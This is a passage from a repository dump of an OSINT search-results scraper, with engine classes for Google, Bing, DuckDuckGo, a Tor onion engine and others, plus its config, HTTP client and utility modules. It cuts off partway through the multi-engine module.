├── search_engines
│   ├── libs
│   │   ├── __init__.py
│   │   ├── get_terminal_size.py
│   │   └── windows_cmd_encoding.py
│   ├── search_results
│   │   └── __init__.py
│   ├── engines
│   │   ├── aol.py
│   │   ├── __init__.py
│   │   ├── bing.py
│   │   ├── ask.py
│   │   ├── mojeek.py
│   │   ├── torch.py
│   │   ├── brave.py
│   │   ├── metager.py
│   │   ├── dogpile.py
│   │   ├── yahoo.py
│   │   ├── google.py
│   │   ├── qwant.py
│   │   ├── startpage.py
│   │   └── duckduckgo.py
│   ├── __init__.py
│   ├── config.py
│   ├── utils.py
│   ├── results.py
│   ├── http_client.py
│   ├── multiple_search_engines.py
│   ├── output.py
│   └── engine.py
├── Logo.png
├── README.md
└── TS-OSINT.py

/search_engines/libs/__init__.py: -------------------------------------------------------------------------------- 1 | '''''' 2 |
-------------------------------------------------------------------------------- /search_engines/search_results/__init__.py: -------------------------------------------------------------------------------- 1 | '''''' 2 |
-------------------------------------------------------------------------------- /Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/Logo.png
-------------------------------------------------------------------------------- /search_engines/__init__.py: -------------------------------------------------------------------------------- 1 | from .engines import * 2 | 3 | 4 | __title__ = 'search_engines' 5 | __version__ = '0.5' 6 | __author__ = 'Tasos M.
Adamopoulos' 7 | 8 | __all__ = [ 9 | 'Google', 10 | 'Bing', 11 | 'Yahoo', 12 | 'Aol', 13 | 'Duckduckgo', 14 | 'Startpage', 15 | 'Dogpile', 16 | 'Ask', 17 | 'Mojeek', 18 | 'Qwant', 19 | 'Torch' 20 | ] 21 | -------------------------------------------------------------------------------- /search_engines/engines/aol.py: -------------------------------------------------------------------------------- 1 | from .yahoo import Yahoo 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Aol(Yahoo): 6 | '''Searches aol.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Aol, self).__init__(proxy, timeout) 9 | self._base_url = u'https://search.aol.com' 10 | 11 | def _first_page(self): 12 | '''Returns the initial page and query.''' 13 | url_str = u'{}/aol/search?q={}&ei=UTF-8&nojs=1' 14 | url = url_str.format(self._base_url, self._query) 15 | self._http_client.get(self._base_url) 16 | return {'url':url, 'data':None} 17 | 18 | -------------------------------------------------------------------------------- /search_engines/engines/__init__.py: -------------------------------------------------------------------------------- 1 | from .aol import Aol 2 | from .ask import Ask 3 | from .bing import Bing 4 | from .dogpile import Dogpile 5 | from .duckduckgo import Duckduckgo 6 | from .google import Google 7 | from .mojeek import Mojeek 8 | from .startpage import Startpage 9 | from .torch import Torch 10 | from .yahoo import Yahoo 11 | from .qwant import Qwant 12 | from .brave import Brave 13 | 14 | 15 | search_engines_dict = { 16 | 'google': Google, 17 | 'bing': Bing, 18 | 'yahoo': Yahoo, 19 | 'aol': Aol, 20 | 'duckduckgo': Duckduckgo, 21 | 'startpage': Startpage, 22 | 'dogpile': Dogpile, 23 | 'ask': Ask, 24 | 'mojeek': Mojeek, 25 | 'qwant': Qwant, 26 | 'brave': Brave, 27 | 'torch': Torch 28 | } 29 | -------------------------------------------------------------------------------- /search_engines/config.py: -------------------------------------------------------------------------------- 1 | from os import path as os_path, pardir as os_pardir, name as os_name 2 | from sys import version_info 3 | 4 | 5 | ## Python version 6 | PYTHON_VERSION = version_info.major 7 | 8 | ## Maximum number of pages to search 9 | SEARCH_ENGINE_RESULTS_PAGES = 20 10 | 11 | ## HTTP request timeout 12 | TIMEOUT = 10 13 | 14 | ## Default User-Agent string 15 | USER_AGENT = 'search_engines/0.5 Repo: https://github.com/tasos-py/Search-Engines-Scraper' 16 | 17 | ## Fake User-Agent string - Google doesn't like the default user-agent 18 | FAKE_USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; rv:84.0) Gecko/20100101 Firefox/84.0' 19 | 20 | ## Proxy server 21 | PROXY = None 22 | 23 | ## TOR proxy server 24 | TOR = 'socks5h://127.0.0.1:9050' 25 | 26 | _base_dir = os_path.abspath(os_path.dirname(os_path.abspath(__file__))) 27 | 28 | ## Path to output files 29 | OUTPUT_DIR = os_path.join(_base_dir, 'search_results') + os_path.sep 30 | 31 | -------------------------------------------------------------------------------- /search_engines/utils.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from .config import PYTHON_VERSION 3 | 4 | 5 | def quote_url(url): 6 | '''encodes URLs.''' 7 | if PYTHON_VERSION == 2: 8 | url = encode_str(url) 9 | return requests.utils.quote(url, safe=';/?:@&=+$,#') 10 | 11 | def unquote_url(url): 12 | '''decodes URLs.''' 13 | if PYTHON_VERSION == 2: 14 | url = encode_str(url) 15 | return decode_bytes(requests.utils.unquote(url)) 16 | 17 | def
is_url(link): 18 | '''Checks if link is a URL''' 19 | parts = requests.utils.urlparse(link) 20 | return bool(parts.scheme and parts.netloc) 21 | 22 | def domain(url): 23 | '''Returns domain from URL''' 24 | host = requests.utils.urlparse(url).netloc 25 | return host.lower().split(':')[0].replace('www.', '') 26 | 27 | def encode_str(s, encoding='utf-8', errors='replace'): 28 | '''Encodes unicode to str, str to bytes.''' 29 | return s if type(s) is bytes else s.encode(encoding, errors=errors) 30 | 31 | def decode_bytes(s, encoding='utf-8', errors='replace'): 32 | '''Decodes bytes to str, str to unicode.''' 33 | return s.decode(encoding, errors=errors) if type(s) is bytes else s 34 | 35 | -------------------------------------------------------------------------------- /search_engines/results.py: -------------------------------------------------------------------------------- 1 | class SearchResults(object): 2 | '''Stores the search results''' 3 | def __init__(self, items=None): 4 | self._results = items or [] 5 | 6 | def links(self): 7 | '''Returns the links found in search results''' 8 | return [row.get('link') for row in self._results] 9 | 10 | def titles(self): 11 | '''Returns the titles found in search results''' 12 | return [row.get('title') for row in self._results] 13 | 14 | def text(self): 15 | '''Returns the text found in search results''' 16 | return [row.get('text') for row in self._results] 17 | 18 | def hosts(self): 19 | '''Returns the domains found in search results''' 20 | return [row.get('host') for row in self._results] 21 | 22 | def results(self): 23 | '''Returns all data found in search results''' 24 | return self._results 25 | 26 | def __getitem__(self, index): 27 | return self._results[index] 28 | 29 | def __len__(self): 30 | return len(self._results) 31 | 32 | def __str__(self): 33 | return '<SearchResults ({} items)>'.format(len(self._results)) 34 | 35 | def append(self, item): 36 | '''appends an item to the results list.''' 37 | self._results.append(item) 38 | 39 | def extend(self, items): 40 | '''appends items to the results list.''' 41 | self._results.extend(items) 42 | -------------------------------------------------------------------------------- /search_engines/engines/bing.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | 4 | 5 | class Bing(SearchEngine): 6 | '''Searches bing.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Bing, self).__init__(proxy, timeout) 9 | self._base_url = u'https://www.bing.com' 10 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'a[href]', 16 | 'title': 'h2', 17 | 'text': 'p', 18 | 'links': 'ol#b_results > li.b_algo', 19 | 'next': 'div#b_content nav[role="navigation"] a.sb_pagN' 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | self._get_page(self._base_url) 26 | url = u'{}/search?q={}&search=&form=QBLH'.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 33 | url = None 34 | if next_page: 35 | url = (self._base_url + next_page) 36 | return {'url':url, 'data':None} 37 |
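
Usage note (not a file in the repository): the engine classes in this package all follow the same pattern — instantiate one, call search() with a query and a page count, and read the collected data from the returned SearchResults object. A minimal sketch, assuming the package is importable as search_engines; the query string and proxy value are illustrative:

    from search_engines import Bing

    engine = Bing()  # optionally Bing(proxy='http://host:port', timeout=10)
    results = engine.search('free programming books', 2)  # query, number of result pages
    for url in results.links():  # SearchResults also exposes titles(), text() and hosts()
        print(url)
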
-------------------------------------------------------------------------------- /search_engines/engines/ask.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Ask(SearchEngine): 6 | '''Searches ask.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Ask, self).__init__(proxy, timeout) 9 | self._base_url = 'https://uk.ask.com' 10 | 11 | def _selectors(self, element): 12 | '''Returns the appropriate CSS selector.''' 13 | selectors = { 14 | 'url': 'a.PartialSearchResults-item-title-link.result-link', 15 | 'title': 'a.PartialSearchResults-item-title-link.result-link', 16 | 'text': 'p.PartialSearchResults-item-abstract', 17 | 'links': 'div.PartialSearchResults-body div.PartialSearchResults-item', 18 | 'next': 'li.PartialWebPagination-next a[href]' 19 | } 20 | return selectors[element] 21 | 22 | def _first_page(self): 23 | '''Returns the initial page and query.''' 24 | url_str = u'{}/web?o=0&l=dir&qo=serpSearchTopBox&q={}' 25 | url = url_str.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | next_page = tags.select_one(self._selectors('next')) 31 | url = None 32 | if next_page: 33 | url = self._base_url + next_page['href'] 34 | return {'url':url, 'data':None} 35 | 36 | -------------------------------------------------------------------------------- /search_engines/engines/mojeek.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | 4 | 5 | class Mojeek(SearchEngine): 6 | '''Searches mojeek.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Mojeek, self).__init__(proxy, timeout) 9 | self._base_url = 'https://www.mojeek.com' 10 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'a.ob[href]', 16 | 'title': 'a.ob[href]', 17 | 'text': 'p.s', 18 | 'links': 'ul.results-standard > li', 19 | 'next': {'href':'div.pagination li a[href]', 'text':'Next'} 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | url = u'{}/search?q={}'.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | selector = self._selectors('next') 31 | next_page = [ 32 | i['href'] for i in tags.select(selector['href']) 33 | if i.text == selector['text'] 34 | ] 35 | url = (self._base_url + next_page[0]) if next_page else None 36 | return {'url':url, 'data':None} 37 | 38 | -------------------------------------------------------------------------------- /search_engines/engines/torch.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import TOR, TIMEOUT 3 | from .. import output as out 4 | 5 | 6 | class Torch(SearchEngine): 7 | '''Uses torch search engine. 
Requires TOR proxy.''' 8 | def __init__(self, proxy=TOR, timeout=TIMEOUT): 9 | super(Torch, self).__init__(proxy, timeout) 10 | self._base_url = u'http://torchdeedp3i2jigzjdmfpn5ttjhthh5wbmda2rr3jvqjg5p77c54dqd.onion' 11 | if not proxy: 12 | out.console('Torch requires TOR proxy!', level=out.Level.warning) 13 | self._current_page = 1 14 | 15 | def _selectors(self, element): 16 | '''Returns the appropriate CSS selector.''' 17 | selectors = { 18 | 'url': 'h5 a[href]', 19 | 'title': 'h5 a[href]', 20 | 'text': 'p', 21 | 'links': 'div.result.mb-3', 22 | 'next': 'ul.pagination a.page-link' 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | url_str = u'{}/search?query={}&action=search' 29 | url = url_str.format(self._base_url, self._query) 30 | return {'url':url, 'data':None} 31 | 32 | def _next_page(self, tags): 33 | '''Returns the next page URL and post data (if any)''' 34 | self._current_page += 1 35 | url_str = u'{}/search?query={}&page={}' 36 | url = url_str.format(self._base_url, self._query, self._current_page) 37 | return {'url':url, 'data':None} 38 | -------------------------------------------------------------------------------- /search_engines/engines/brave.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Brave(SearchEngine): 6 | '''Searches brave.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Brave, self).__init__(proxy, timeout) 9 | self._base_url = 'https://search.brave.com' 10 | 11 | def _selectors(self, element): 12 | '''Returns the appropriate CSS selector.''' 13 | selectors = { 14 | 'url': 'a.result-header[href]', 15 | 'title': 'a.result-header[href] span.snippet-title', 16 | 'text': 'div.snippet-content', 17 | 'links': 'div#results div[data-loc="main"]', 18 | 'next': {'tag':'div#pagination a[href]', 'text':'Next', 'skip':'disabled'} 19 | } 20 | return selectors[element] 21 | 22 | def _first_page(self): 23 | '''Returns the initial page and query.''' 24 | url_str = u'{}/search?q={}&source=web' 25 | url = url_str.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | selector = self._selectors('next') 31 | next_page = [ 32 | tag for tag in tags.select(selector['tag']) 33 | if tag.get_text().strip() == selector['text'] and selector['skip'] not in tag['class'] 34 | ] 35 | url = None 36 | if next_page: 37 | url = self._base_url + next_page[0]['href'] 38 | return {'url':url, 'data':None} 39 | 40 | -------------------------------------------------------------------------------- /search_engines/engines/metager.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | 3 | from search_engines.engine import SearchEngine 4 | from search_engines.config import PROXY, TIMEOUT, FAKE_USER_AGENT 5 | 6 | 7 | class Metager(SearchEngine): 8 | '''Searches metager.org''' 9 | 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Metager, self).__init__(proxy, timeout) 12 | self._base_url = 'https://metager.org' 13 | self.set_headers({'User-Agent': FAKE_USER_AGENT}) 14 | 15 | def _selectors(self, element): 16 | """Returns the appropriate CSS selector.""" 17 | selectors = { 18 | 'url': 'a.result-link', 19 | 'title': 'h2.result-title a', 20 | 'text': 'div.result-description', 21 | 
'links': '#results div.result', 22 | 'next': '#next-search-link a', 23 | } 24 | return selectors[element] 25 | 26 | def redirect(self, query): 27 | '''Redirects initial request to actual result page.''' 28 | response = self._get_page(query) 29 | src_page = BeautifulSoup(response.html, "html.parser") 30 | url = src_page.select_one('iframe').get('src') 31 | 32 | return url 33 | 34 | def _first_page(self): 35 | '''Returns the initial page and query.''' 36 | query = f'{self._base_url}/meta/meta.ger3?eingabe={self._query}' 37 | url = self.redirect(query) 38 | 39 | return {'url': url, 'data': None} 40 | 41 | def _next_page(self, tags): 42 | '''Returns the next page URL.''' 43 | next_page = tags.select_one(self._selectors('next')) 44 | url = None 45 | if next_page: 46 | url = self.redirect(next_page['href']) 47 | 48 | return {'url': url, 'data': None} 49 | -------------------------------------------------------------------------------- /search_engines/engines/dogpile.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Dogpile(SearchEngine): 7 | '''Seaches dogpile.com''' 8 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 9 | super(Dogpile, self).__init__(proxy, timeout) 10 | self._base_url = 'https://www.dogpile.com' 11 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 12 | 13 | def _selectors(self, element): 14 | '''Returns the appropriate CSS selector.''' 15 | selectors = { 16 | 'url': 'a[class$=title]', 17 | 'title': 'a[class$=title]', 18 | 'text': {'tag':'span', 'index':-1}, 19 | 'links': 'div[class^=web-] div[class$=__result]', 20 | 'next': 'a.pagination__num--next' 21 | } 22 | return selectors[element] 23 | 24 | def _first_page(self): 25 | '''Returns the initial page and query.''' 26 | url = u'{}/serp?q={}'.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 33 | url = (self._base_url + next_page) if next_page else None 34 | return {'url':url, 'data':None} 35 | 36 | def _get_text(self, tag, item='text'): 37 | '''Returns the text of search results items.''' 38 | selector = self._selectors('text') 39 | tag = tag.select(selector['tag'])[selector['index']] 40 | return self._get_tag_item(tag, 'text') 41 | 42 | 43 | -------------------------------------------------------------------------------- /search_engines/engines/yahoo.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Yahoo(SearchEngine): 7 | '''Searches yahoo.com''' 8 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 9 | super(Yahoo, self).__init__(proxy, timeout) 10 | self._base_url = 'https://search.yahoo.com' 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'div.compTitle h3.title a', 16 | 'title': 'div.compTitle h3.title', 17 | 'text': 'div.compText', 18 | 'links': 'div#web li div.dd.algo.algo-sr', 19 | 'next': 'a.next' 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | url_str = u'{}/search?p={}&ei=UTF-8&nojs=1' 26 | url 
= url_str.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | url = self._get_tag_item(tags.select_one(selector), 'href') or None 33 | return {'url':url, 'data':None} 34 | 35 | def _get_url(self, link, item='href'): 36 | selector = self._selectors('url') 37 | url = self._get_tag_item(link.select_one(selector), 'href') 38 | url = url.split(u'/RU=')[-1].split(u'/R')[0] 39 | return unquote_url(url) 40 | 41 | def _get_title(self, tag, item='text'): 42 | '''Returns the title of search results items.''' 43 | title = tag.select_one(self._selectors('title')) 44 | for span in title.select('span'): 45 | span.decompose() 46 | return self._get_tag_item(title, item) 47 | 48 | 49 | -------------------------------------------------------------------------------- /search_engines/engines/google.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Google(SearchEngine): 7 | '''Searches google.com''' 8 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 9 | super(Google, self).__init__(proxy, timeout) 10 | self._base_url = 'https://www.google.com' 11 | self._delay = (2, 6) 12 | self._current_page = 1 13 | 14 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 15 | 16 | def _selectors(self, element): 17 | '''Returns the appropriate CSS selector.''' 18 | selectors = { 19 | 'url': 'a[href]', 20 | 'title': 'a', 21 | 'text': 'div[data-content-feature="1"]', 22 | 'links': 'div#search div.g', 23 | 'next': 'a[href][aria-label="Page {page}"]' 24 | } 25 | return selectors[element] 26 | 27 | def _first_page(self): 28 | '''Returns the initial page and query.''' 29 | url = u'{}/search?q={}'.format(self._base_url, self._query) 30 | return {'url':url, 'data':None} 31 | 32 | def _next_page(self, tags): 33 | '''Returns the next page URL and post data (if any)''' 34 | self._current_page += 1 35 | selector = self._selectors('next').format(page=self._current_page) 36 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 37 | url = None 38 | if next_page: 39 | url = self._base_url + next_page 40 | return {'url':url, 'data':None} 41 | 42 | def _get_url(self, tag, item='href'): 43 | '''Returns the URL of search results item.''' 44 | selector = self._selectors('url') 45 | url = self._get_tag_item(tag.select_one(selector), item) 46 | 47 | if url.startswith(u'/url?q='): 48 | url = url.replace(u'/url?q=', u'').split(u'&sa=')[0] 49 | return unquote_url(url) 50 | -------------------------------------------------------------------------------- /search_engines/http_client.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from collections import namedtuple 3 | 4 | from .config import TIMEOUT, PROXY, USER_AGENT 5 | from . import utils as utl 6 | 7 | 8 | class HttpClient(object): 9 | '''Performs HTTP requests. 
A `requests` wrapper, essentialy''' 10 | def __init__(self, timeout=TIMEOUT, proxy=PROXY): 11 | self.session = requests.session() 12 | self.session.proxies = self._set_proxy(proxy) 13 | self.session.headers['User-Agent'] = USER_AGENT 14 | self.session.headers['Accept-Language'] = 'en-GB,en;q=0.5' 15 | 16 | self.timeout = timeout 17 | self.response = namedtuple('response', ['http', 'html']) 18 | 19 | def get(self, page): 20 | '''Submits a HTTP GET request.''' 21 | page = self._quote(page) 22 | try: 23 | req = self.session.get(page, timeout=self.timeout) 24 | self.session.headers['Referer'] = page 25 | except requests.exceptions.RequestException as e: 26 | return self.response(http=0, html=e.__doc__) 27 | return self.response(http=req.status_code, html=req.text) 28 | 29 | def post(self, page, data): 30 | '''Submits a HTTP POST request.''' 31 | page = self._quote(page) 32 | try: 33 | req = self.session.post(page, data, timeout=self.timeout) 34 | self.session.headers['Referer'] = page 35 | except requests.exceptions.RequestException as e: 36 | return self.response(http=0, html=e.__doc__) 37 | return self.response(http=req.status_code, html=req.text) 38 | 39 | def _quote(self, url): 40 | '''URL-encodes URLs.''' 41 | if utl.decode_bytes(utl.unquote_url(url)) == utl.decode_bytes(url): 42 | url = utl.quote_url(url) 43 | return url 44 | 45 | def _set_proxy(self, proxy): 46 | '''Returns HTTP or SOCKS proxies dictionary.''' 47 | if proxy: 48 | if not utl.is_url(proxy): 49 | raise ValueError('Invalid proxy format!') 50 | proxy = {'http':proxy, 'https':proxy} 51 | return proxy 52 | 53 | -------------------------------------------------------------------------------- /search_engines/engines/qwant.py: -------------------------------------------------------------------------------- 1 | from json import loads 2 | 3 | from ..engine import SearchEngine 4 | from ..config import PROXY, TIMEOUT 5 | from ..utils import unquote_url 6 | 7 | 8 | class Qwant(SearchEngine): 9 | '''Searches qwant.com''' 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Qwant, self).__init__(proxy, timeout) 12 | self._base_url = u'https://api.qwant.com/v3/search/web?q={}&count=10&locale=en_US&offset={}&device=desktop&safesearch=1' 13 | self._offset = 0 14 | self._max_offset = 50 15 | 16 | def _selectors(self, element): 17 | '''Returns the appropriate CSS selector.''' 18 | selectors = { 19 | 'url': 'url', 20 | 'title': 'title', 21 | 'text': 'desc', 22 | 'links': ['data', 'result', 'items', 'mainline'] 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | url = self._base_url.format(self._query, self._offset) 29 | return {'url':url, 'data':None} 30 | 31 | def _next_page(self, tags): 32 | '''Returns the next page URL and post data (if any)''' 33 | self._offset += 10 34 | url = None 35 | status = loads(tags.get_text())['status'] 36 | if status == 'success' and self._offset <= self._max_offset: 37 | url = self._base_url.format(self._query, self._offset) 38 | return {'url':url, 'data':None} 39 | 40 | def _get_url(self, tag, item='href'): 41 | '''Returns the URL of search results item.''' 42 | return unquote_url(tag.get(self._selectors('url'), u'')) 43 | 44 | def _get_title(self, tag, item='text'): 45 | '''Returns the title of search results items.''' 46 | return tag.get(self._selectors('title'), u'') 47 | 48 | def _get_text(self, tag, item='text'): 49 | '''Returns the text of search results items.''' 50 | return tag.get(self._selectors('text'), u'') 51 | 52 
| def _filter_results(self, soup): 53 | '''Processes and filters the search results.''' 54 | tags = loads(soup.get_text())['data']['result']['items']['mainline'] 55 | tags = [j for i in tags for j in i['items'] if i['type'] != u'ads'] 56 | results = [self._item(l) for l in tags] 57 | 58 | if u'url' in self._filters: 59 | results = [l for l in results if self._query_in(l['link'])] 60 | if u'title' in self._filters: 61 | results = [l for l in results if self._query_in(l['title'])] 62 | if u'text' in self._filters: 63 | results = [l for l in results if self._query_in(l['text'])] 64 | if u'host' in self._filters: 65 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 66 | return results 67 | -------------------------------------------------------------------------------- /search_engines/engines/startpage.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | 3 | from ..engine import SearchEngine 4 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 5 | from .. import output as out 6 | 7 | 8 | class Startpage(SearchEngine): 9 | '''Searches startpage.com''' 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Startpage, self).__init__(proxy, timeout) 12 | self._base_url = 'https://www.startpage.com' 13 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 14 | 15 | def _selectors(self, element): 16 | '''Returns the appropriate CSS selector.''' 17 | selectors = { 18 | 'url': 'a.w-gl__result-url', 19 | 'title': 'a.w-gl__result-title h3', 20 | 'text': 'p.w-gl__description', 21 | 'links': 'section.w-gl div.w-gl__result', 22 | 'next': {'form':'form.pagination__form', 'text':'Next'}, 23 | 'search_form': 'form#search input[name]', 24 | 'blocked_form': 'form#blocked_feedback_form' 25 | } 26 | return selectors[element] 27 | 28 | def _first_page(self): 29 | '''Returns the initial page and query.''' 30 | response = self._get_page(self._base_url) 31 | tags = BeautifulSoup(response.html, "html.parser") 32 | selector = self._selectors('search_form') 33 | 34 | data = { 35 | i['name']: i.get('value', '') 36 | for i in tags.select(selector) 37 | } 38 | data['query'] = self._query 39 | url = self._base_url + '/sp/search' 40 | return {'url':url, 'data':data} 41 | 42 | def _next_page(self, tags): 43 | '''Returns the next page URL and post data (if any)''' 44 | selector = self._selectors('next') 45 | forms = [ 46 | form 47 | for form in tags.select(selector['form']) 48 | if form.get_text(strip=True) == selector['text'] 49 | ] 50 | url, data = None, None 51 | if forms: 52 | url = self._base_url + forms[0]['action'] 53 | data = { 54 | i['name']:i.get('value', '') 55 | for i in forms[0].select('input') 56 | } 57 | return {'url':url, 'data':data} 58 | 59 | def _is_ok(self, response): 60 | '''Checks if the HTTP response is 200 OK.''' 61 | soup = BeautifulSoup(response.html, 'html.parser') 62 | selector = self._selectors('blocked_form') 63 | is_blocked = soup.select_one(selector) 64 | 65 | self.is_banned = response.http in [403, 429, 503] or is_blocked 66 | 67 | if response.http == 200 and not is_blocked: 68 | return True 69 | msg = 'Banned' if is_blocked else ('HTTP ' + str(response.http)) if response.http else response.html 70 | out.console(msg, level=out.Level.error) 71 | return False 72 | -------------------------------------------------------------------------------- /search_engines/engines/duckduckgo.py: -------------------------------------------------------------------------------- 1 | from ..engine import 
SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | import re 5 | import json 6 | from bs4 import BeautifulSoup 7 | 8 | 9 | class Duckduckgo(SearchEngine): 10 | '''Searches duckduckgo.com''' 11 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 12 | super(Duckduckgo, self).__init__(proxy, timeout) 13 | self._base_url = u'https://links.duckduckgo.com{}&biaexp=b&msvrtexp=b&videxp=a&nadse=b&tjsexp=b' 14 | self._main_url = u'https://duckduckgo.com/?q={}&t=h_' 15 | self._current_page = None 16 | 17 | def _selectors(self, element): 18 | '''Returns the appropriate CSS selector - regex pattern, in this case.''' 19 | selectors = { 20 | 'first_page': r'DDG\.deep\.initialize\(\'(.*?)\'\)', 21 | 'next_page': r'"n"\:\s*"(/d\.js.*?)"', 22 | 'results': r"DDG\.pageLayout\.load\('d'\,\s*(\[.*?\])\s*\);" 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | res = self._http_client.get(self._main_url.format(self._query)) 29 | match = re.search(self._selectors('first_page'), res.html) 30 | if match: 31 | return {'url':self._base_url.format(match.group(1)), 'data':None} 32 | return {'url':None, 'data':None} 33 | 34 | def _next_page(self, tags): 35 | '''Returns the next page URL and post data (if any)''' 36 | match = re.search(self._selectors('next_page'), tags.get_text()) 37 | if match: 38 | return {'url':self._base_url.format(match.group(1)), 'data':None} 39 | return {'url':None, 'data':None} 40 | 41 | def _get_page(self, page, data=None): 42 | '''Gets pagination links.''' 43 | self._http_client.session.headers['Referer'] = 'https://duckduckgo.com/' 44 | response = self._http_client.get(page) 45 | self._current_page = response.html 46 | return response 47 | 48 | def _filter_results(self, soup): 49 | '''Processes and filters the search results.''' 50 | match = re.search(self._selectors('results'), self._current_page) 51 | if not match: 52 | return {} 53 | data = json.loads(re.sub('\n|\r', '', match.group(1)))[:-1] 54 | results = [ 55 | {'link':i['u'], 'title':i['t'], 'text': BeautifulSoup(i['a'], 'html.parser').get_text()} 56 | for i in data 57 | ] 58 | 59 | if u'url' in self._filters: 60 | results = [l for l in results if self._query_in(l['link'])] 61 | if u'title' in self._filters: 62 | results = [l for l in results if self._query_in(l['title'])] 63 | if u'text' in self._filters: 64 | results = [l for l in results if self._query_in(l['text'])] 65 | if u'host' in self._filters: 66 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 67 | return results 68 | -------------------------------------------------------------------------------- /search_engines/multiple_search_engines.py: -------------------------------------------------------------------------------- 1 | from .results import SearchResults 2 | from .engines import search_engines_dict 3 | from . import output as out 4 | from . 
